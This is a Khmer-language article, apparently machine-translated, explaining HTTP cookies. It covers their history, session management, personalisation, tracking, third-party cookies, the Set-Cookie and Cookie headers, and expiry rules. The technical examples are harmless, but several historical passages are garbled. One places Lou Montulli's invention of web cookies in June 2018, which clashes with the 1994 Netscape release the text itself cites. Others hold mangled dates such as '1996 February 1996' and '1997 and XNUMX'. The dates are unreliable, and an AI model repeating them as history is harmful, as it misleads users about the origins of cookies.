ខូគីតាមអ៊ីនធឺណិត៖ តើវាជាអ្វី? និយមន័យ ប្រភពដើម ប្រភេទ និងភាពឯកជន

Un ខូគី ឬខូគីគេហទំព័រ (ឬ ខូគី, អក្សរកាត់ដូចជា សាក្សី in Quebec) ត្រូវបានកំណត់ដោយពិធីការទំនាក់ទំនង HTTP ថាជាលំដាប់នៃព័ត៌មានដែលផ្ញើដោយម៉ាស៊ីនមេ HTTP ទៅកាន់ម៉ាស៊ីនភ្ញៀវ HTTP ដែលក្រោយមកត្រឡប់មកវិញរាល់ពេលដែលម៉ាស៊ីនមេ HTTP ដូចគ្នាត្រូវបានសួរក្រោមលក្ខខណ្ឌជាក់លាក់។

ខូគីគឺស្មើនឹង a ឯកសារអត្ថបទតូចត្រូវបានរក្សាទុកនៅលើស្ថានីយ របស់អ្នកប្រើអ៊ីនធឺណិត។ ដែលមានស្រាប់អស់រយៈពេលជាង 20 ឆ្នាំ ពួកគេអនុញ្ញាតឱ្យអ្នកអភិវឌ្ឍន៍គេហទំព័ររក្សាទុកទិន្នន័យអ្នកប្រើប្រាស់ ដើម្បីជួយសម្រួលដល់ការរុករករបស់ពួកគេ និងអនុញ្ញាតឱ្យមានមុខងារមួយចំនួន។ ខូគីតែងតែមានភាពចម្រូងចម្រាសច្រើន ឬតិច ព្រោះវាផ្ទុកព័ត៌មានផ្ទាល់ខ្លួនដែលនៅសេសសល់ ដែលអាចជាសក្តានុពលត្រូវបានកេងប្រវ័ញ្ចដោយភាគីទីបី។

វាត្រូវបានផ្ញើជាបឋមកថា HTTP ដោយម៉ាស៊ីនមេគេហទំព័រទៅកាន់កម្មវិធីរុករកតាមអ៊ីនធឺណិតដែលត្រឡប់វាមិនផ្លាស់ប្តូររាល់ពេលដែលវាចូលប្រើម៉ាស៊ីនមេ។ ខូឃីអាចត្រូវបានប្រើដើម្បី ការផ្ទៀងផ្ទាត់ភាពត្រឹមត្រូវ, វគ្គមួយ។ (ការថែទាំរដ្ឋ) និងសម្រាប់ រក្សាទុកព័ត៌មានជាក់លាក់អំពីអ្នកប្រើប្រាស់ដូចជាចំណូលចិត្តគេហទំព័រ ឬខ្លឹមសារនៃរទេះទិញទំនិញអេឡិចត្រូនិក។ ពាក្យ ខូគី មានប្រភពមកពី ខូគីវេទមន្តដែលជាគំនិតដ៏ល្បីនៅក្នុងកុំព្យូទ័រយូនីក ដែលបានបំផុសគំនិត និងឈ្មោះនៃខូឃីកម្មវិធីរុករក។ មានជម្រើសមួយចំនួនសម្រាប់ខូគី ដែលនីមួយៗមានការប្រើប្រាស់ គុណសម្បត្តិ និងគុណវិបត្តិរៀងៗខ្លួន។

ក្នុងនាមជាឯកសារអត្ថបទសាមញ្ញ ខូគីមិនអាចប្រតិបត្តិបានទេ។ ពួកគេ​មិនមែន ទាំង spyware ឬមេរោគទោះបីជាខូគីពីគេហទំព័រមួយចំនួនត្រូវបានរកឃើញដោយកម្មវិធីប្រឆាំងមេរោគជាច្រើន ព្រោះវាអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់ត្រូវបានតាមដាននៅពេលពួកគេចូលមើលគេហទំព័រច្រើន។ 

កម្មវិធីរុករកទំនើបភាគច្រើនអនុញ្ញាតឱ្យអ្នកប្រើ សម្រេចចិត្តថាតើត្រូវទទួលយក ឬបដិសេធខូគី. អ្នកប្រើប្រាស់ក៏អាច ជ្រើសរើសរយៈពេលដែលខូគីត្រូវបានរក្សាទុក. ទោះយ៉ាងណាក៏ដោយ ការបដិសេធទាំងស្រុងនៃខូគីធ្វើឱ្យគេហទំព័រមួយចំនួនមិនអាចប្រើបាន។ ឧទាហរណ៍ ទុករទេះទិញទំនិញ ឬគេហទំព័រដែលតម្រូវឱ្យចូលដោយប្រើព័ត៌មានសម្ងាត់ (ឈ្មោះអ្នកប្រើប្រាស់ និងពាក្យសម្ងាត់)។

Historique

ពាក្យនេះ ខូគី មកពីពាក្យអង់គ្លេស ខូគីវេទមន្តដែលជាកញ្ចប់ទិន្នន័យដែលកម្មវិធីទទួល និងត្រឡប់មិនផ្លាស់ប្តូរ។ Cookies ត្រូវ​បាន​គេ​ប្រើ​រួច​ហើយ​នៅ​ក្នុង IT កាលណា លូ ម៉ុងធូលី មានគំនិតប្រើពួកវាក្នុងការទំនាក់ទំនងតាមអ៊ីនធឺណិត នៅខែមិថុនាឆ្នាំ ២០១៨ ។ នៅពេលនោះ គាត់ត្រូវបានជួលដោយ Netscape Communications ដែលបានបង្កើតកម្មវិធី e-commerce សម្រាប់អតិថិជន។ ខូគីបានផ្តល់ដំណោះស្រាយចំពោះបញ្ហានៃភាពជឿជាក់នៃការអនុវត្តរទេះទិញទំនិញនិម្មិតរបស់ហាង។

John Giannandrea និង Lou Montulli បានសរសេរការបញ្ជាក់ខូគីដំបូងរបស់ Netscape នៅឆ្នាំដដែលនោះ។ កំណែ 0.9 បេតានៃ Mosaic Netscape ចេញផ្សាយនៅថ្ងៃទី 13 ខែតុលា ឆ្នាំ 1994 រួមបញ្ចូលគ្នា បច្ចេកវិទ្យាខូឃី (មើលប្រកាស) ការប្រើប្រាស់ខូគីដំបូង (មិនសាកល្បង) គឺដើម្បីកំណត់ថាតើអ្នកទស្សនាគេហទំព័រ Netscape បានចូលមើលគេហទំព័រពីមុនឬអត់។ Montulli បានដាក់ពាក្យសុំប៉ាតង់សម្រាប់បច្ចេកវិទ្យាខូគីក្នុងឆ្នាំ 1995 ហើយប៉ាតង់របស់សហរដ្ឋអាមេរិក 5774670 ត្រូវបានផ្តល់។ បានផ្តល់ក្នុងឆ្នាំ 1998.

បន្ទាប់ពីត្រូវបានអនុវត្តនៅក្នុង Netscape 0.9 beta ក្នុងឆ្នាំ 1994 ខូគីត្រូវបានដាក់បញ្ចូលទៅក្នុង Internet Explorer 2 ដែលបានចេញផ្សាយនៅខែតុលា ឆ្នាំ 1995។

ការដាក់ឱ្យប្រើប្រាស់ខូគីមិនទាន់ត្រូវបានសាធារណជនបានដឹងយ៉ាងទូលំទូលាយនៅឡើយ។ ជាពិសេស ខូគីត្រូវបានទទួលយកតាមលំនាំដើមនៅក្នុងការកំណត់កម្មវិធីរុករក ហើយអ្នកប្រើប្រាស់មិនត្រូវបានជូនដំណឹងអំពីវត្តមានរបស់ពួកគេទេ។ មនុស្សមួយចំនួនបានដឹងអំពីអត្ថិភាពនៃខូគីនៅជុំវិញត្រីមាសទី 1995 នៃឆ្នាំ 12 ប៉ុន្តែសាធារណជនទូទៅបានទទួលយកនូវអត្ថិភាពរបស់វាបន្ទាប់ពី Financial Times បានបោះពុម្ពអត្ថបទមួយនៅថ្ងៃទី 1996 ខែកុម្ភៈ ឆ្នាំ 1996។ ក្នុងឆ្នាំដដែលនោះ ខូគីបានទទួលការចាប់អារម្មណ៍យ៉ាងខ្លាំងពីប្រព័ន្ធផ្សព្វផ្សាយ។ ដោយសារតែការឈ្លានពានឯកជនភាពដែលអាចកើតមាន។ ប្រធានបទនៃខូគីត្រូវបានពិភាក្សានៅក្នុងការពិគ្រោះយោបល់ចំនួនពីររបស់គណៈកម្មការពាណិជ្ជកម្មសហព័ន្ធអាមេរិកក្នុងឆ្នាំ 1997 និង XNUMX ។

ការអភិវឌ្ឍន៍នៃការបញ្ជាក់ខូគីផ្លូវការកំពុងដំណើរការរួចហើយ។ ការពិភាក្សាដំបូងនៃការបញ្ជាក់ជាផ្លូវការបានធ្វើឡើងនៅក្នុងខែមេសា ឆ្នាំ 1995 នៅលើបញ្ជីសំបុត្ររួម www-talk ។ ក្រុមការងារពិសេស IETF ត្រូវបានបង្កើតឡើង។ សំណើជំនួសពីរសម្រាប់ការណែនាំរដ្ឋចំពោះប្រតិបត្តិការ HTTP ត្រូវបានស្នើឡើងដោយ Brian Behlendorf និង David Kristol រៀងៗខ្លួន ប៉ុន្តែក្រុមដែលដឹកនាំដោយ Kristol ខ្លួនឯងបានសម្រេចចិត្តប្រើការបញ្ជាក់របស់ Netscape ជាចំណុចចាប់ផ្តើម។ នៅខែកុម្ភៈ ឆ្នាំ 1996 ក្រុមការងារបានកំណត់ថាខូគីភាគីទីបីគឺជាការគំរាមកំហែងយ៉ាងសំខាន់ចំពោះឯកជនភាព។ ការបញ្ជាក់ដែលផលិតដោយក្រុមត្រូវបានបោះពុម្ពជាយថាហេតុ RFC 2109.

ចាប់ពីចុងឆ្នាំ 2014 យើងឃើញផ្ទាំងបដាអំពីខូគីនៅលើគេហទំព័រជាច្រើន។ យ៉ាងហោចណាស់មានផ្នែកបន្ថែមកម្មវិធីរុករកតាមអ៊ីនធឺណិតមួយដែលអនុញ្ញាត បដាមិនត្រូវបានបង្ហាញ.

ប្រភេទនៃខូគី និងការប្រើប្រាស់

ការគ្រប់គ្រងសម័យ

ខូឃីអាចត្រូវបានប្រើដើម្បីរក្សាទិន្នន័យអ្នកប្រើប្រាស់ក្នុងអំឡុងពេលរុករក ប៉ុន្តែក៏មានការចូលមើលច្រើនដងផងដែរ។ ខូឃីត្រូវបានណែនាំដើម្បីផ្តល់មធ្យោបាយនៃការអនុវត្តរទេះទិញទំនិញអេឡិចត្រូនិក ដែលជាឧបករណ៍និម្មិតដែលអ្នកប្រើប្រាស់អាចប្រមូលរបស់របរដែលគាត់ចង់ទិញនៅពេលកំពុងរុករកគេហទំព័រ។

សព្វថ្ងៃនេះ កម្មវិធីដូចជារទេះទិញទំនិញជំនួសវិញរក្សាទុកបញ្ជីរបស់របរនៅក្នុងមូលដ្ឋានទិន្នន័យនៅលើម៉ាស៊ីនមេ ដែលជាជម្រើសល្អជាង។ ជាងការរក្សាទុកពួកវានៅក្នុងខូគីខ្លួនឯង។ ម៉ាស៊ីនមេគេហទំព័រផ្ញើខូគីដែលមានលេខសម្គាល់សម័យពិសេសមួយ។ បន្ទាប់មក កម្មវិធីរុករកតាមអ៊ីនធឺណិតនឹងត្រឡប់លេខសម្គាល់សម័យនេះនៅលើសំណើជាបន្តបន្ទាប់នីមួយៗ ហើយធាតុនៅក្នុងកញ្ចប់ត្រូវបានរក្សាទុក និងភ្ជាប់ជាមួយលេខសម្គាល់សម័យតែមួយនេះ។

ការប្រើខូគីញឹកញាប់មានប្រយោជន៍សម្រាប់ការចូលទៅក្នុងគេហទំព័រដោយប្រើព័ត៌មានសម្ងាត់។ និយាយឱ្យខ្លី ម៉ាស៊ីនមេគេហទំព័រដំបូងផ្ញើខូគីដែលមានលេខសម្គាល់សម័យតែមួយ។ បន្ទាប់មកអ្នកប្រើប្រាស់ផ្តល់ព័ត៌មានសម្ងាត់របស់ពួកគេ (ជាធម្មតាឈ្មោះអ្នកប្រើប្រាស់ និងពាក្យសម្ងាត់)។ កម្មវិធីបណ្តាញបន្ទាប់មកផ្ទៀងផ្ទាត់វគ្គ និងអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់ចូលប្រើសេវាកម្ម។

បដិរូបកម្ម

ខូឃីអាចត្រូវបានប្រើដើម្បីចងចាំព័ត៌មានអំពីអ្នកប្រើប្រាស់គេហទំព័រ ដើម្បីបង្ហាញគាត់នូវខ្លឹមសារសមស្របនាពេលអនាគត។ ឧទាហរណ៍ ម៉ាស៊ីនមេគេហទំព័រអាចផ្ញើខូគីដែលមានឈ្មោះអ្នកប្រើប្រាស់ចុងក្រោយដែលប្រើដើម្បីចូលគេហទំព័រនោះ ដូច្នេះឈ្មោះអ្នកប្រើប្រាស់អាចត្រូវបានបញ្ចូលជាមុននៅពេលចូលមើលនាពេលអនាគត។

គេហទំព័រជាច្រើនប្រើខូគីសម្រាប់ការកំណត់ផ្ទាល់ខ្លួនដោយផ្អែកលើចំណូលចិត្តរបស់អ្នកប្រើប្រាស់។ អ្នកប្រើប្រាស់ជ្រើសរើសចំណូលចិត្តរបស់ពួកគេក្នុងទម្រង់មួយ ហើយបញ្ជូនវាទៅម៉ាស៊ីនមេ។ ម៉ាស៊ីនមេអ៊ិនកូដចំណូលចិត្តនៅក្នុងខូគី ហើយបញ្ជូនវាត្រឡប់ទៅកម្មវិធីរុករកវិញ។ ជាបន្តបន្ទាប់ រាល់ពេលដែលអ្នកប្រើប្រាស់ចូលទៅកាន់ទំព័រនៃគេហទំព័រនេះ កម្មវិធីរុករកនឹងត្រឡប់ខូគី ហើយដូច្នេះបញ្ជីចំណូលចិត្ត។ បន្ទាប់មកម៉ាស៊ីនមេអាចប្ដូរទំព័រតាមបំណងតាមចំណូលចិត្តរបស់អ្នកប្រើ។ ឧទាហរណ៍ គេហទំព័រ Wikipedia អនុញ្ញាតឱ្យអ្នកប្រើប្រាស់របស់ខ្លួនជ្រើសរើសស្បែកនៃគេហទំព័រដែលពួកគេចូលចិត្ត។ ម៉ាស៊ីនស្វែងរក Google អនុញ្ញាតឱ្យអ្នកប្រើប្រាស់របស់ខ្លួន (ទោះបីជាពួកគេមិនត្រូវបានចុះឈ្មោះ) ជ្រើសរើសចំនួនលទ្ធផលដែលពួកគេចង់ឃើញនៅលើទំព័រលទ្ធផលនីមួយៗ។

ការ​តាមដាន

តាមដានខូគីត្រូវបានប្រើដើម្បីតាមដានទម្លាប់រុករករបស់អ្នកប្រើប្រាស់អ៊ីនធឺណិត។ នេះក៏អាចត្រូវបានធ្វើដោយផ្នែកដោយប្រើអាសយដ្ឋាន IP របស់កុំព្យូទ័រធ្វើសំណើសម្រាប់ទំព័រមួយ ឬដោយប្រើបឋមកថា HTTP 'referrer' ដែលអតិថិជនផ្ញើជាមួយរាល់សំណើ ប៉ុន្តែខូគីអនុញ្ញាតឱ្យមានភាពច្បាស់លាស់ជាងមុន។ នេះអាចត្រូវបានធ្វើដូចក្នុងឧទាហរណ៍ខាងក្រោម៖

1. ប្រសិនបើអ្នកប្រើហៅទំព័រមួយនៅលើគេហទំព័រ ហើយសំណើមិនមានខូគី នោះម៉ាស៊ីនមេសន្មត់ថានេះជាទំព័រដំបូងដែលបានចូលមើលដោយអ្នកប្រើប្រាស់។ បន្ទាប់មក ម៉ាស៊ីនមេបង្កើតខ្សែអក្សរចៃដន្យ ហើយផ្ញើវាទៅកម្មវិធីរុករកតាមអ៊ីនធឺណិត រួមជាមួយនឹងទំព័រដែលបានស្នើសុំ។
2. ចាប់ពីពេលនេះតទៅ ខូគីនឹងត្រូវបានផ្ញើដោយស្វ័យប្រវត្តិដោយកម្មវិធីរុករកតាមអ៊ីនធឺណិតរាល់ពេលដែលទំព័រថ្មីនៃគេហទំព័រត្រូវបានហៅ។ ម៉ាស៊ីនមេនឹងផ្ញើទំព័រដូចធម្មតា ប៉ុន្តែនឹងកត់ត្រា URL នៃទំព័រដែលហៅថា កាលបរិច្ឆេទ ពេលវេលានៃសំណើ និងខូគីក្នុងឯកសារកំណត់ហេតុ។

ដោយ​មើល​ទៅ​ឯកសារ​កំណត់​ហេតុ នោះ​វា​អាច​មើល​ឃើញ​ទំព័រ​ណា​ដែល​អ្នក​ប្រើ​បាន​ចូល​មើល និង​តាម​លំដាប់​ណា។ ឧទាហរណ៍ ប្រសិនបើឯកសារមានសំណើមួយចំនួនដែលបានធ្វើឡើងដោយប្រើខូគី id=abc វាអាចបង្ហាញថាសំណើទាំងអស់នេះបានមកពីអ្នកប្រើប្រាស់ដូចគ្នា។ URL ដែលបានស្នើសុំ កាលបរិច្ឆេទ និងពេលវេលាដែលភ្ជាប់ជាមួយសំណើអនុញ្ញាតឱ្យការរុករករបស់អ្នកប្រើប្រាស់ត្រូវបានតាមដាន។

ខូគីភាគីទីបី និងកម្មវិធីបង្ហាញគេហទំព័រ ដែលបានពន្យល់ខាងក្រោម បន្ថែមពីលើការបើកការតាមដានតាមគេហទំព័រផ្សេងៗ។ ការតាមដានគេហទំព័រតែមួយ ជាទូទៅត្រូវបានប្រើសម្រាប់គោលបំណងស្ថិតិ។ ផ្ទុយទៅវិញ ការតាមដានតាមគេហទំព័រផ្សេងៗគ្នាដោយប្រើខូគីភាគីទីបី ជាទូទៅត្រូវបានប្រើប្រាស់ដោយក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្ម ដើម្បីផលិតទម្រង់អ្នកប្រើប្រាស់អនាមិក (ដែលបន្ទាប់មកត្រូវបានប្រើដើម្បីកំណត់ការផ្សាយពាណិជ្ជកម្មណាមួយដែលគួរបង្ហាញដល់អ្នកប្រើប្រាស់ ក៏ដូចជាផ្ញើអ៊ីមែលឱ្យគាត់ដែលត្រូវគ្នាទៅនឹងការផ្សាយពាណិជ្ជកម្មទាំងនេះ — SPAM )

ការតាមដានខូគីគឺជាហានិភ័យនៃការលុកលុយនៃភាពឯកជនរបស់អ្នកប្រើប្រាស់ ប៉ុន្តែពួកវាអាចលុបបានយ៉ាងងាយស្រួល។ កម្មវិធីរុករកតាមអ៊ីនធឺណិតទំនើបភាគច្រើនរួមបញ្ចូលជម្រើសដើម្បីលុបខូគីដែលជាប់លាប់ដោយស្វ័យប្រវត្តិនៅពេលបិទកម្មវិធី។

ខូគីភាគីទីបី

រូបភាព និងវត្ថុផ្សេងទៀតដែលមាននៅក្នុងទំព័របណ្ដាញអាចរស់នៅលើម៉ាស៊ីនមេ ខុសពីគេហទំព័រដែលបង្ហោះ។ ដើម្បីបង្ហាញទំព័រ កម្មវិធីរុករកនឹងទាញយកវត្ថុទាំងអស់នេះ។ គេហទំព័រភាគច្រើនមានព័ត៌មានពីប្រភពផ្សេងៗគ្នា។ ឧទាហរណ៍ ប្រសិនបើអ្នកវាយ www.example.com ទៅក្នុងកម្មវិធីរុករកតាមអ៊ីនធឺណិតរបស់អ្នក ជាញឹកញាប់នឹងមានវត្ថុ ឬការផ្សាយពាណិជ្ជកម្មនៅលើផ្នែកនៃទំព័រដែលមកពីប្រភពផ្សេងៗគ្នា ពោលគឺមកពីដែនផ្សេងពី www.example.com។ ខូគីភាគី "ទីមួយ" គឺជាខូគីដែលត្រូវបានកំណត់ដោយដែនដែលបានរាយក្នុងរបារអាសយដ្ឋានរបស់កម្មវិធីរុករក។ ខូគីភាគីទីបីត្រូវបានកំណត់ដោយវត្ថុមួយនៃទំព័រដែលមកពីដែនផ្សេង។

តាមលំនាំដើម កម្មវិធីរុករកតាមអ៊ីនធឺណិតដូចជា Mozilla Firefox, Microsoft Internet Explorer និង Opera ទទួលយកខូគីភាគីទីបី ប៉ុន្តែអ្នកប្រើប្រាស់អាចផ្លាស់ប្តូរការកំណត់នៅក្នុងជម្រើសកម្មវិធីរុករកដើម្បីរារាំងពួកគេ។ មិនមានហានិភ័យសុវត្ថិភាពដែលមាននៅក្នុងខូគីភាគីទីបីដែលបើកដំណើរការមុខងារគេហទំព័រនោះទេ ប៉ុន្តែពួកវាក៏ត្រូវបានប្រើដើម្បីតាមដានអ្នកប្រើប្រាស់ផងដែរ។ ពីគេហទំព័រមួយទៅគេហទំព័រមួយ។.

ឧបករណ៍ដូចជា Ghostery មានសម្រាប់កម្មវិធីរុករកទាំងអស់រួមទាំង Google Chrome អាចទប់ស្កាត់ការផ្លាស់ប្តូររវាងភាគីទីបី។

ការអនុវត្ត

ខូគីគឺជាបំណែកតូចៗនៃទិន្នន័យដែលផ្ញើដោយម៉ាស៊ីនមេគេហទំព័រទៅកាន់កម្មវិធីរុករក។ កម្មវិធីរុករកតាមអ៊ីនធឺណិតបញ្ជូនពួកវាដោយមិនផ្លាស់ប្តូរទៅម៉ាស៊ីនមេ ដោយណែនាំស្ថានភាព (ការចងចាំព្រឹត្តិការណ៍អតីតកាល) ទៅក្នុងប្រតិបត្តិការ HTTP ដែលគ្មានរដ្ឋ។ បើគ្មានខូគី រាល់ការទាញយកទំព័របណ្ដាញ ឬធាតុផ្សំនៃទំព័របណ្ដាញគឺជាព្រឹត្តិការណ៍ដាច់ដោយឡែក ដោយមិនគិតពីសំណើផ្សេងទៀតដែលធ្វើឡើងចំពោះគេហទំព័រតែមួយ។ បន្ថែមពីលើការអាចត្រូវបានកំណត់ដោយម៉ាស៊ីនមេគេហទំព័រ ខូគីក៏អាចត្រូវបានកំណត់ដោយភាសាស្គ្រីបដូចជា JavaScript ប្រសិនបើត្រូវបានគាំទ្រ និងអនុញ្ញាតដោយកម្មវិធីរុករក។

ការបញ្ជាក់ខូគីផ្លូវការណែនាំថាកម្មវិធីរុករកគួរតែអាចរក្សាទុក និងផ្ញើឡើងវិញនូវចំនួនខូគីអប្បបរមា។ ជាពិសេស កម្មវិធីរុករកតាមអ៊ីនធឺណិតគួរតែអាចរក្សាទុកយ៉ាងហោចណាស់ 300 ខូគីនៃបួនគីឡូបៃនីមួយៗ និងយ៉ាងហោចណាស់ 20 ខូគីសម្រាប់ម៉ាស៊ីនមេ ឬដែនតែមួយ។

យោងតាមផ្នែក 3.1 នៃ RFC 2965ឈ្មោះខូគីមិនប្រកាន់អក្សរតូចធំទេ។

ខូគីអាចបញ្ជាក់កាលបរិច្ឆេទនៃការផុតកំណត់របស់វា ក្នុងករណីនេះខូគីនឹងត្រូវបានលុបនៅកាលបរិច្ឆេទនេះ។ ប្រសិនបើខូគីមិនបញ្ជាក់កាលបរិច្ឆេទផុតកំណត់ទេ ខូគីត្រូវបានលុបភ្លាមៗនៅពេលដែលអ្នកប្រើចាកចេញពីកម្មវិធីរុករករបស់គាត់។ ដូច្នេះ ការបញ្ជាក់កាលបរិច្ឆេទផុតកំណត់គឺជាវិធីមួយដើម្បីធ្វើឱ្យខូគីរស់បានតាមរយៈវគ្គជាច្រើន។ សម្រាប់ហេតុផលនេះ ខូគីដែលមានកាលបរិច្ឆេទផុតកំណត់ត្រូវបានគេនិយាយថាជា ជាប់លាប់. កម្មវិធីឧទាហរណ៍៖ គេហទំព័រលក់រាយអាចប្រើខូគីជាប់លាប់ដើម្បីកត់ត្រារបស់របរដែលអ្នកប្រើប្រាស់បានដាក់ក្នុងរទេះទិញទំនិញរបស់ពួកគេ (តាមពិត ខូគីអាចសំដៅទៅលើធាតុដែលបានរក្សាទុកក្នុងមូលដ្ឋានទិន្នន័យនៅលើគេហទំព័រលក់ ហើយមិនមែននៅក្នុងកុំព្យូទ័ររបស់អ្នកទេ) . តាមរយៈមធ្យោបាយនេះ ប្រសិនបើអ្នកប្រើប្រាស់ចាកចេញពីកម្មវិធីរុករកតាមអ៊ីនធឺណិតរបស់ពួកគេដោយមិនធ្វើការទិញ ហើយត្រលប់ទៅវានៅពេលក្រោយ ពួកគេនឹងអាចស្វែងរកទំនិញនៅក្នុងរទេះម្តងទៀត។ ប្រសិនបើខូគីទាំងនេះមិនបានផ្តល់កាលបរិច្ឆេទផុតកំណត់ទេ ពួកវានឹងផុតកំណត់នៅពេលដែលកម្មវិធីរុករកត្រូវបានបិទ ហើយព័ត៌មានអំពីមាតិកានៃកញ្ចប់នឹងបាត់បង់។

ខូគីអាចត្រូវបានកំណត់ក្នុងវិសាលភាពចំពោះដែនជាក់លាក់មួយ ដែនរង ឬផ្លូវនៅលើម៉ាស៊ីនមេដែលបានបង្កើតពួកវា។

ការបង្កើតខូឃី

ការផ្ទេរគេហទំព័រត្រូវបានធ្វើដោយប្រើ HyperText Transfer Protocol (HTTP) ។ ដោយ​មិន​អើពើ​ខូគី កម្មវិធីរុករក​ហៅ​ទំព័រ​មួយ​ពី​ម៉ាស៊ីន​បម្រើ​បណ្ដាញ​ដោយ​ផ្ញើ​ឱ្យ​ពួកគេ​នូវ​អត្ថបទ​ខ្លី​មួយ​ដែល​គេ​ហៅ សំណើ HTTP. ឧទាហរណ៍ ដើម្បីចូលទៅកាន់ទំព័រ www.example.org/index.html កម្មវិធីរុករកតាមអ៊ីនធឺណិតភ្ជាប់ទៅម៉ាស៊ីនមេ www.example.org ហើយផ្ញើសំណើដែលមើលទៅដូចនេះ៖

	ទទួលបាន /index.html HTTP/1.1Host៖ www.example.org
កម្មវិធីរុករក	→	ម៉ាស៊ីនបម្រើ

ម៉ាស៊ីនមេឆ្លើយតបដោយការផ្ញើទំព័រដែលបានស្នើ នាំមុខដោយអត្ថបទស្រដៀងគ្នា ដែលទាំងមូលត្រូវបានហៅ ការឆ្លើយតប HTTP. កញ្ចប់ព័ត៌មាននេះអាចមានបន្ទាត់ដែលណែនាំកម្មវិធីរុករកឱ្យរក្សាទុកខូគី៖

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (ទំព័រ HTML)
កម្មវិធីរុករក	←	ម៉ាស៊ីនបម្រើ

ម៉ាស៊ីនមេផ្ញើតែបន្ទាត់ Set-Cookie ប្រសិនបើម៉ាស៊ីនមេចង់ឱ្យកម្មវិធីរុករកផ្ទុកខូគី។ Set-Cookie គឺ​ជា​សំណើ​សម្រាប់​កម្មវិធី​រុករក​ក្នុង​ការ​រក្សាទុក​ឈ្មោះ = តម្លៃ​ខ្សែ​អក្សរ ហើយ​បញ្ជូន​វា​មក​វិញ​ក្នុង​រាល់​សំណើ​អនាគត​ទៅ​កាន់​ម៉ាស៊ីន​មេ។ ប្រសិនបើកម្មវិធីរុករកគាំទ្រខូគី និងខូគីត្រូវបានបើកនៅក្នុងជម្រើសកម្មវិធីរុករក ខូគីនឹងត្រូវបានរួមបញ្ចូលនៅក្នុងសំណើជាបន្តបន្ទាប់ទាំងអស់ដែលបានធ្វើឡើងចំពោះម៉ាស៊ីនមេដូចគ្នា។ ឧទាហរណ៍ កម្មវិធីរុករកតាមអ៊ីនធឺណិតហៅទំព័រ www.example.org/news.html ដោយផ្ញើសំណើខាងក្រោមទៅកាន់ម៉ាស៊ីនមេ www.example.org៖

	GET /news.html HTTP/1.1Host៖ www.example.orgCookie: name=valueAccept: */*
កម្មវិធីរុករក	→	ម៉ាស៊ីនបម្រើ

នេះគឺជាសំណើសម្រាប់ទំព័រមួយផ្សេងទៀតពីម៉ាស៊ីនមេដូចគ្នា ហើយខុសពីទំព័រទីមួយខាងលើ ដោយសារវាមានខ្សែអក្សរដែលម៉ាស៊ីនមេបានផ្ញើពីមុនទៅកាន់កម្មវិធីរុករក។ អរគុណចំពោះមធ្យោបាយនេះ ម៉ាស៊ីនមេដឹងថាសំណើនេះត្រូវបានភ្ជាប់ទៅពាក្យមុន។ ម៉ាស៊ីនមេឆ្លើយតបដោយការផ្ញើទំព័រដែលហៅថា ហើយថែមទាំងបន្ថែមខូគីផ្សេងទៀតទៅវាផងដែរ។

តម្លៃនៃខូគីអាចត្រូវបានផ្លាស់ប្តូរដោយម៉ាស៊ីនមេដោយផ្ញើបន្ទាត់ថ្មី Set-Cookie: name=new_value ក្នុងការឆ្លើយតបទៅនឹងទំព័រដែលបានហៅ។ បន្ទាប់មកកម្មវិធីរុករកនឹងជំនួសតម្លៃចាស់ជាមួយនឹងតម្លៃថ្មី។

បន្ទាត់ Set-Cookie ជាធម្មតាត្រូវបានបង្កើតឡើងដោយកម្មវិធី CGI ឬភាសាស្គ្រីបផ្សេងទៀត មិនមែនដោយម៉ាស៊ីនមេ HTTP ទេ។ ម៉ាស៊ីនមេ HTTP (ឧទាហរណ៍៖ Apache) នឹងបញ្ជូនតែលទ្ធផលនៃកម្មវិធី (ឯកសារដែលនាំមុខដោយបឋមកថាដែលមានខូគី) ទៅកាន់កម្មវិធីរុករក។

ខូគីក៏អាចត្រូវបានកំណត់ដោយ JavaScript ឬភាសាស្រដៀងគ្នាផ្សេងទៀតដែលដំណើរការនៅក្នុងកម្មវិធីរុករក ពោលគឺនៅលើផ្នែកអតិថិជនជាជាងផ្នែកខាងម៉ាស៊ីនមេ។ នៅក្នុង JavaScript វត្ថុ document.cookie ត្រូវបានប្រើសម្រាប់គោលបំណងនេះ។ ឧទាហរណ៍ សេចក្តីថ្លែងការណ៍ document.cookie = "temperature=20" បង្កើតខូគីដែលមានឈ្មោះថា "សីតុណ្ហភាព" និងមានតម្លៃ 20 ។

លក្ខណៈនៃខូគី

បន្ថែមពីលើឈ្មោះ/តម្លៃគូ ខូគីក៏អាចមានកាលបរិច្ឆេទផុតកំណត់ ផ្លូវ ឈ្មោះដែន និងប្រភេទនៃការតភ្ជាប់ដែលមានបំណង ពោលគឺ ធម្មតា ឬអ៊ិនគ្រីប។ RFC 2965 ក៏កំណត់ថាខូគីត្រូវតែមានលេខកំណែចាំបាច់ ប៉ុន្តែជាទូទៅវាត្រូវបានលុបចោល។ ផ្នែកទិន្នន័យទាំងនេះធ្វើតាមឈ្មោះ =new_value pair ហើយត្រូវបានបំបែកដោយសញ្ញាក្បៀស។ ឧទាហរណ៍ ខូគីអាចត្រូវបានបង្កើតដោយម៉ាស៊ីនមេដោយផ្ញើបន្ទាត់ Set-Cookie: name=new_value; ផុតកំណត់ = កាលបរិច្ឆេទ; ផ្លូវ =/; domain=.example.org.

ការផុតកំណត់នៃខូគី

ខូគីផុតកំណត់ ហើយបន្ទាប់មកមិនត្រូវបានផ្ញើដោយកម្មវិធីរុករកទៅម៉ាស៊ីនមេក្នុងស្ថានភាពដូចខាងក្រោម៖

• នៅពេលដែលកម្មវិធីរុករកត្រូវបានបិទ ប្រសិនបើខូគីមិនស្ថិតស្ថេរ។
• នៅពេលដែលកាលបរិច្ឆេទផុតកំណត់ខូគីបានកន្លងផុតទៅ។
• នៅពេលដែលកាលបរិច្ឆេទផុតកំណត់ខូគីត្រូវបានផ្លាស់ប្តូរ (ដោយម៉ាស៊ីនមេ ឬស្គ្រីប) ទៅកាលបរិច្ឆេទពីមុន។
• នៅពេលដែលកម្មវិធីរុករកលុបខូគីតាមសំណើរបស់អ្នកប្រើ។

